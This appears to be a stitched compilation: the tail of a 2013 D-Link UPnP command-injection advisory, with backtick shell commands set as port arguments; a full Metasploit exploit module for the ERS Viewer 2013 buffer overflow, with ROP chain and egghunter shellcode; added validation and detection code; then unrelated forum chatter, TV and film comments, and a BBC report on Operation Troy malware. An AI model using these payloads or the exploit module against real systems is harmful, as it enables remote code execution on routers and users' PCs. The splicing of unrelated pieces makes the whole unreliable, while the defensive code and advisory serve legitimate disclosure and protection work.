    Argument Name: NewExternalPort
    Data Type: ui2
    Allowed Values: []
    Set NewExternalPort value to: `ping 192.168.0.100`

* NewInternalPort
  Required argument:
    Argument Name: NewInternalPort
    Data Type: ui2
    Allowed Values: []
    Set NewInternalPort value to: `ping 192.168.0.100`

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/dir-865-v105-shell.png

============
Solution
============
DIR-300 rev B - disable UPnP
DIR-600 - update to v2.17b01
DIR-645 - update to v1.04b11
DIR-845 - update to v1.02b03
DIR-865 - disable UPnP

============
Credits
============
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/advisories
Twitter: @s3cur1ty_de

============
Time Line:
============
06.06.2013 - discovered vulnerability
07.06.2013 - reported vulnerability to vendor => some fixes are available but there is no communication with the vendor
06.07.2013 - public disclosure at Sigint 2013
06.07.2013 - public disclosure of advisory

===================== Advisory end =====================
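An added example, not D-Link's code or anything from the advisory: the allow-list validation of AddPortMapping arguments that the affected soap.cgi lacks, run over a constructed copy of the request above. It assumes the argument names and service namespace from that request, and treats NewInternalClient as a LAN IPv4 address (stricter than the `string` type miranda reports for it).

```python
import ipaddress
import re
import xml.etree.ElementTree as ET

SERVICE_NS = "urn:schemas-upnp-org:service:WANIPConnection:1"

# Constructed copy of the request body quoted in the advisory; `COMMAND` marks
# where an injected shell command would sit.
SAMPLE_BODY = """<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope"
    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
  <SOAP-ENV:Body>
    <m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
      <NewPortMappingDescription></NewPortMappingDescription>
      <NewLeaseDuration></NewLeaseDuration>
      <NewInternalClient>`COMMAND`</NewInternalClient>
      <NewEnabled>1</NewEnabled>
      <NewExternalPort>634</NewExternalPort>
      <NewRemoteHost></NewRemoteHost>
      <NewProtocol>TCP</NewProtocol>
      <NewInternalPort>45</NewInternalPort>
    </m:AddPortMapping>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
"""


def _ipv4(value):
    # One dotted-quad address; hostnames, backticks and spaces all fail here.
    return str(ipaddress.IPv4Address(value))


def _port(value):
    # ui2 used as a port number: plain decimal digits in 1..65535.
    if not re.fullmatch(r"[0-9]{1,5}", value) or not 1 <= int(value) <= 65535:
        raise ValueError("not a valid port")
    return int(value)


def _lease(value):
    # ui4 lease in seconds; the advisory's request leaves it empty (= 0).
    if value != "" and (not re.fullmatch(r"[0-9]{1,10}", value) or int(value) > 0xFFFFFFFF):
        raise ValueError("not an unsigned 32-bit integer")
    return int(value or 0)


def _choice(*allowed):
    def check(value):
        if value not in allowed:
            raise ValueError("must be one of %s" % (allowed,))
        return value
    return check


def _description(value):
    # Free text, limited to a conservative character set and length.
    if not re.fullmatch(r"[A-Za-z0-9 ._-]{0,64}", value):
        raise ValueError("disallowed characters in description")
    return value


# Every argument of AddPortMapping and the check it must pass.
ARGUMENT_CHECKS = {
    "NewRemoteHost": lambda v: "" if v == "" else _ipv4(v),
    "NewExternalPort": _port,
    "NewProtocol": _choice("TCP", "UDP"),
    "NewInternalPort": _port,
    "NewInternalClient": _ipv4,
    "NewEnabled": _choice("0", "1"),
    "NewPortMappingDescription": _description,
    "NewLeaseDuration": _lease,
}


def parse_add_port_mapping(body):
    """Return the raw argument strings of the AddPortMapping action in body."""
    root = ET.fromstring(body)
    action = root.find(".//{%s}AddPortMapping" % SERVICE_NS)
    if action is None:
        raise ValueError("no AddPortMapping action in SOAP body")
    return {child.tag: (child.text or "") for child in action}


def validate_add_port_mapping(args):
    """Split args into (clean, errors); act on the request only if errors is empty."""
    clean, errors = {}, {}
    for name, check in ARGUMENT_CHECKS.items():
        if name not in args:
            errors[name] = "missing"
            continue
        try:
            clean[name] = check(args[name])
        except ValueError as exc:
            errors[name] = "%s: %r" % (exc, args[name])
    return clean, errors
```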
-
Description: This Metasploit module exploits a buffer overflow vulnerability found in ERS Viewer 2013. The vulnerability exists in the module ermapper_u.dll, where the function rf_report_error handles user provided data in an insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted .ers file. This Metasploit module has been tested successfully with ERS Viewer 2013 (versions 13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.
Author: James Fitts, juan vazquez
Source: ERS Viewer 2013 ERS File Handling Buffer Overflow ≈ Packet Storm
Code:

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Egghunter

  def initialize(info={})
    super(update_info(info,
      'Name'           => "ERS Viewer 2013 ERS File Handling Buffer Overflow",
      'Description'    => %q{
        This module exploits a buffer overflow vulnerability found in ERS Viewer 2013.
        The vulnerability exists in the module ermapper_u.dll, where the function
        rf_report_error handles user provided data in a insecure way. It results in
        arbitrary code execution under the context of the user viewing a specially
        crafted .ers file. This module has been tested successfully with ERS Viewer
        2013 (versions 13.0.0.1151) on Windows XP SP3 and Windows 7 SP1.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'James Fitts', # Vulnerability Discovery
          'juan vazquez' # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2013-3482' ],
          [ 'OSVDB', '93650' ],
          [ 'URL', 'http://secunia.com/advisories/53620/' ]
        ],
      'Payload'        =>
        {
          'Space'       => 4000,
          'DisableNops' => true,
        },
      'DefaultOptions' =>
        {
          'ExitFunction' => "process",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Tested on Windows XP SP3
          [ 'ERS Viewer 2013 13.0.0.1151 / NO DEP / NO ASLR',
            {
              'Offset' => 191,
              'Ret'    => 0x100329E9 # jmp eax # from ermapper_u.dll
            }
          ],
          # Tested on Windows XP SP3 and Windows 7 SP1
          [ 'ERS Viewer 2013 13.0.0.1151 / DEP & ASLR bypass',
            {
              'Offset'          => 191,
              'Ret'             => 0x100E1152, # xchg eax, esp # ret # from ermapper_u.dll
              'RetNull'         => 0x30d07f00, # ret ending with null byte # from ethrlib.dll
              'VirtualAllocPtr' => 0x1010c0f4
            }
          ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "May 23 2013",
      'DefaultTarget'  => 1))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.ers']),
      ], self.class)
  end

  def create_rop_chain()
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets =
      [
        0x10082624, # POP EAX # RETN [ermapper_u.dll]
        0x1010c0f4, # ptr to &VirtualAlloc() [IAT ermapper_u.dll]
        0x1001a9c0, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ermapper_u.dll]
        0x1005db36, # XCHG EAX,ESI # RETN [ermapper_u.dll]
        0x10105d87, # POP EBX # RETN [ermapper_u.dll]
        0xffffffff, #
        0x30d059d9, # INC EBX # RETN [ethrlib.dll]
        0x30d059d9, # INC EBX # RETN [ethrlib.dll]
        0x100e9dd9, # POP EAX # RETN [ermapper_u.dll]
        0xa2dbcf75, # put delta into eax (-> put 0x00001000 into edx)
        0x1001aa04, # ADD EAX,5D24408B # RETN [ermapper_u.dll]
        0x10016a98, # XCHG EAX,EDX # OR EAX,4C48300 # POP EDI # POP EBP # RETN [ermapper_u.dll]
        0x10086d21, # RETN (ROP NOP) [ermapper_u.dll]
        0x1001a148, # & push esp # ret [ermapper_u.dll]
        0x10082624, # POP EAX # RETN [ermapper_u.dll]
        0xffffffc0, # Value to negate, will become 0x00000040
        0x100f687d, # NEG EAX # RETN [ermapper_u.dll]
        0x1001e720, # XCHG EAX,ECX # ADC EAX,5DE58B10 # RETN [ermapper_u.dll]
        0x100288b5, # POP EAX # RETN [ermapper_u.dll]
        0x90909090, # nop
        0x100e69e0, # PUSHAD # RETN [ermapper_u.dll]
      ].flatten.pack("V*")

    return rop_gadgets
  end

  # Restore the stack pointer in order to execute the final payload successfully
  def fix_stack
    pivot =  "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18]  # get teb
    pivot << "\x83\xC0\x08"              # add eax, byte 8     # get pointer to stacklimit
    pivot << "\x8b\x20"                  # mov esp, [eax]      # put esp at stacklimit
    pivot << "\x81\xC4\x30\xF8\xFF\xFF"  # add esp, -2000      # plus a little offset
    return pivot
  end

  # In the Windows 7 case, in order to bypass ASLR/DEP successfully, after finding
  # the payload on memory we can't jump there directly, but allocate executable memory
  # and jump there. Badchars: "\x0a\x0d\x00"
  def hunter_suffix(payload_length)
    # push flProtect (0x40)
    suffix =  "\xB8\xC0\xFF\xFF\xFF"    # mov eax, 0xffffffc0
    suffix << "\xF7\xD8"                # neg eax
    suffix << "\x50"                    # push eax
    # push flAllocationType (0x3000)
    suffix << "\x66\x05\xC0\x2F"        # add ax, 0x2fc0
    suffix << "\x50"                    # push eax
    # push dwSize (0x1000)
    suffix << "\x66\x2D\xFF\x1F"        # sub ax, 0x1fff
    suffix << "\x48"                    # dec eax
    suffix << "\x50"                    # push eax
    # push lpAddress
    suffix << "\xB8\x0C\x0C\x0C\x0C"    # mov eax, 0x0c0c0c0c
    suffix << "\x50"                    # push eax
    # Call VirtualAlloc
    suffix << "\xFF\x15" + [target['VirtualAllocPtr']].pack("V") # call ds:VirtualAlloc
    # Copy payload (edi) to Allocated memory (eax)
    suffix << "\x89\xFE"                # mov esi, edi
    suffix << "\x89\xC7"                # mov edi, eax
    suffix << "\x31\xC9"                # xor ecx, ecx
    suffix << "\x66\x81\xC1" + [payload_length].pack("v") # add cx, payload_length
    suffix << "\xF3\xA4"                # rep movsb
    # Jmp to the final payload (eax)
    suffix << "\xFF\xE0"                # jmp eax
    return suffix
  end

  def exploit
    # These badchars do not apply to the final payload
    badchars = [0x0c, 0x0d, 0x0a].pack("C*")
    eggoptions = {
      :checksum => true,
      :eggtag => 'w00t'
    }

    my_payload = fix_stack + payload.encoded
    if target.name =~ /DEP & ASLR bypass/
      # The payload length can't include NULL's in order to
      # build the stub which will copy the final payload to
      # executable memory
      while [my_payload.length].pack("v").include?("\x00")
        my_payload << rand_text(1)
      end
    end

    hunter,egg = generate_egghunter(my_payload, badchars, eggoptions)
    if target.name =~ /DEP & ASLR bypass/
      hunter.gsub!(/\xff\xe7/, hunter_suffix(my_payload.length))
    end

    if target.name =~ /NO DEP/
      buf = rand_text_alpha(1)
      buf << (0x01..0x04).to_a.pack("C*") # Necessary to align EAX as expected
      buf << "AA" # EAX pointing to buf[5] prefixed with 0x00 after ret
      buf << hunter
      buf << rand_text_alpha(target['Offset'] - buf.length)
      buf << [target.ret].pack("V") # jmp eax
      buf << rand_text_alpha(8)
      buf << egg
    elsif target.name =~ /DEP & ASLR bypass/
      buf = rand_text_alpha(1)
      buf << (0x01..0x04).to_a.pack("C*") # Necessary to align EAX as expected
      buf << [target['RetNull']].pack("V")[1,3] # EAX pointing to buf[5] prefixed with 0x00 after ret
      buf << create_rop_chain
      buf << hunter
      buf << rand_text_alpha(target['Offset'] - buf.length)
      buf << [target.ret].pack("V") # xchg eax, esp # ret
      buf << rand_text_alpha(8)
      buf << egg
    end

    ers = %Q|
DatasetHeader Begin
#{buf}
End
|

    file_create(ers)
  end
end
```
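An added example, not part of the module: a heuristic that inspects the DatasetHeader region of an .ers file for what a file built by this module has to carry (one run of bytes longer than the 191-byte offset to the return address, raw non-printable bytes, or the doubled default 'w00t' egg tag) while a normal text header passes. The benign header fields and the crafted stand-in are constructed samples, not output of the module.

```python
import string

PRINTABLE = frozenset(string.printable.encode("ascii"))
HEADER_START = b"DatasetHeader Begin"
MAX_TOKEN = 191            # 'Offset' => 191 in the module's targets
EGG_MARKER = b"w00tw00t"   # :eggtag => 'w00t', doubled as the egghunter expects


def inspect_ers(data):
    """Return a verdict dict for raw file bytes; 'suspicious' is the summary."""
    result = {"has_header": False, "max_token": 0, "nonprintable": 0,
              "egg_marker": False, "reasons": []}
    start = data.find(HEADER_START)
    if start < 0:
        # Not a parseable ERS header at all: do not hand it to the viewer.
        result["reasons"].append("no DatasetHeader block")
        result["suspicious"] = True
        return result
    result["has_header"] = True
    header = data[start + len(HEADER_START):]
    # ERS headers are whitespace-separated text; count bytes outside that set
    # and measure the longest whitespace-free run.
    result["nonprintable"] = sum(1 for b in header if b not in PRINTABLE)
    result["max_token"] = max((len(t) for t in header.split()), default=0)
    result["egg_marker"] = EGG_MARKER in data
    if result["max_token"] > MAX_TOKEN:
        result["reasons"].append("token of %d bytes exceeds %d"
                                 % (result["max_token"], MAX_TOKEN))
    if result["nonprintable"]:
        result["reasons"].append("%d non-printable bytes in header"
                                 % result["nonprintable"])
    if result["egg_marker"]:
        result["reasons"].append("egghunter tag %r present" % EGG_MARKER)
    result["suspicious"] = bool(result["reasons"])
    return result


# Constructed benign header in the ERS text format (field names assumed).
BENIGN_ERS = b"""DatasetHeader Begin
\tVersion = "6.0"
\tName = "sample.ers"
\tDataSetType = ERStorage
\tDataType = Raster
\tByteOrder = LSBFirst
\tCoordinateSpace Begin
\t\tDatum = "WGS84"
\t\tProjection = "GEODETIC"
\t\tCoordinateType = EN
\t\tUnits = "METERS"
\t\tRotation = 0:0:0.0
\tCoordinateSpace End
\tRasterInfo Begin
\t\tCellType = Unsigned8BitInteger
\t\tNrOfLines = 4
\t\tNrOfCellsPerLine = 4
\t\tNrOfBands = 1
\tRasterInfo End
DatasetHeader End
"""

# Constructed stand-in for a crafted file: a raw-byte alignment prefix, one
# oversized run, the egg tag and NOP-style filler. No real payload inside.
CRAFTED_ERS = (b"DatasetHeader Begin\n"
               + b"A" + bytes([1, 2, 3, 4]) + b"AA"
               + b"B" * 300 + EGG_MARKER + b"\x90" * 16
               + b"\nEnd\n")


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_ERS), ("crafted", CRAFTED_ERS)):
        verdict = inspect_ers(sample)
        print(name, "suspicious" if verdict["suspicious"] else "clean", verdict["reasons"])
```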
-
Stop replying to his posts, all of you just report him directly. He's some loser in the mood for a laugh who made yet another account to get us to troll.
-
I can say Hannibal won me over right from the first episode. It's so calm, cold, exactly to my taste. You can follow all the events closely; there aren't very many characters. What's curious though is how the show ended... will Will get out of prison and return to the FBI?

@Dexter: As you've seen, it has started again, and Vogel fascinated me. There's something suspicious about her though... at least after episode two she gave the impression of a thief.

@Movies: I saw G.I. Joe: Retaliation. My impression of this film is that the whole thing is a very well orchestrated production by the U.S.A., namely to send a very clear message to the other nuclear powers that if they don't submit to the demands and rules imposed by them they'll have problems. I've also now seen 42: a film centred on Harrison Ford and a black baseball player. Here it's a fight against the racism that existed among Americans back then... of course in the end everything turns out fine and dandy. (Film based on true events; at the end there are also photos of the people who actually existed.)
-
Hackers who wiped tens of thousands of PC hard drives in South Korea earlier this year also appear to be targeting the country's military secrets, according to a report.

(Picture caption: McAfee said it found malware designed to copy sensitive data held by the South Korean military)

A study by McAfee Labs said the group has created malware which scanned systems for keywords including "weapon", "US Army" and "secret". It said that once a computer's contents had been catalogued, the attackers could "grab documents at will".

South Korea has played down the threat. Its defence ministry told the Associated Press news agency that it was technically impossible to have lost classified reports because the computers on which it stored military secrets were not connected to the net. A spokesman for the Pentagon said it planned to review the report.

Social network

McAfee said the attacks were part of a long-term spying operation dating back to at least 2009 which it called Operation Troy because the name of the ancient city repeatedly appeared in the hackers' code. It began investigating the group following an attack in March which caused data held on PCs used by several banks and TV networks to be deleted.

Although the security firm said that the malware used to wipe the disks was distinct from that used to hunt for the military secrets, it said there were so many similarities between the two that it believed they must be created by the same team.

It traced the spying effort back to at least 2009 when it said the hackers managed to place an exploit on a military social networking site. It added that it believed the code was also spread through the use of "spear phishing" - email or other messages masquerading as official communications which were designed to fool specific individuals into handing over logins and other sensitive information.

(Picture caption: TV network KBS was among the organisations targeted by the 20 March cyber-attack)

The report said that once the malware was in place it searched the infected systems for "interesting" documents. To do this it scanned for a variety of Korean and English-language keywords. The study lists dozens of examples including "tactics", "brigade", "logistics" and "Operation Key Resolve" - a military exercise involving both South Korean and US forces carried out every year. McAfee said it had opted to withhold other "sensitive" terms at the request of US officials.

The report explained the software then flagged which computers appeared to have the most valuable contents and uploaded copies of their directories to the attackers' servers. It said the hackers were then able to pick and choose which files to download in order to keep network traffic to a minimum, helping them avoid detection.

McAfee also warned that it had discovered a version of the spying malware which had the ability to destroy data in a way similar to the one used against the civilian targets. "This capability could be devastating if military networks were to suddenly be wiped after an adversary had gathered intelligence," it said. "There was at least one limitation, however. We found the malware of February 2011 could wipe its targets only if it was detected that it was being debugged or analysed by a security product."

Wiper function

A spokesman for South Korea's government denied classified documents would have been at risk since the computer network that stored them was not connected to the net.

(Picture caption: McAfee said the malware contained code designed to hunt out military-related terms)

"It's physically separated," said Kim Min-Seok. However, one of the report's authors suggested there was still a risk. "It is not entirely impossible to extract information from a closed network that is disconnected from the internet," said senior threat researcher Ryan Sherstobitoff. "[but] it would require some extensive planning and understanding of the internal layout to stage such an exfiltration [unauthorised data transfer] to the external world."

The report does not name who McAfee believes to be responsible; however, South Korean officials have previously said that the 20 March attack "resembled North Korea's past hacking patterns".

Source: BBC.co.uk
-
3 hours of download for each video. You would have done better to make a torrent.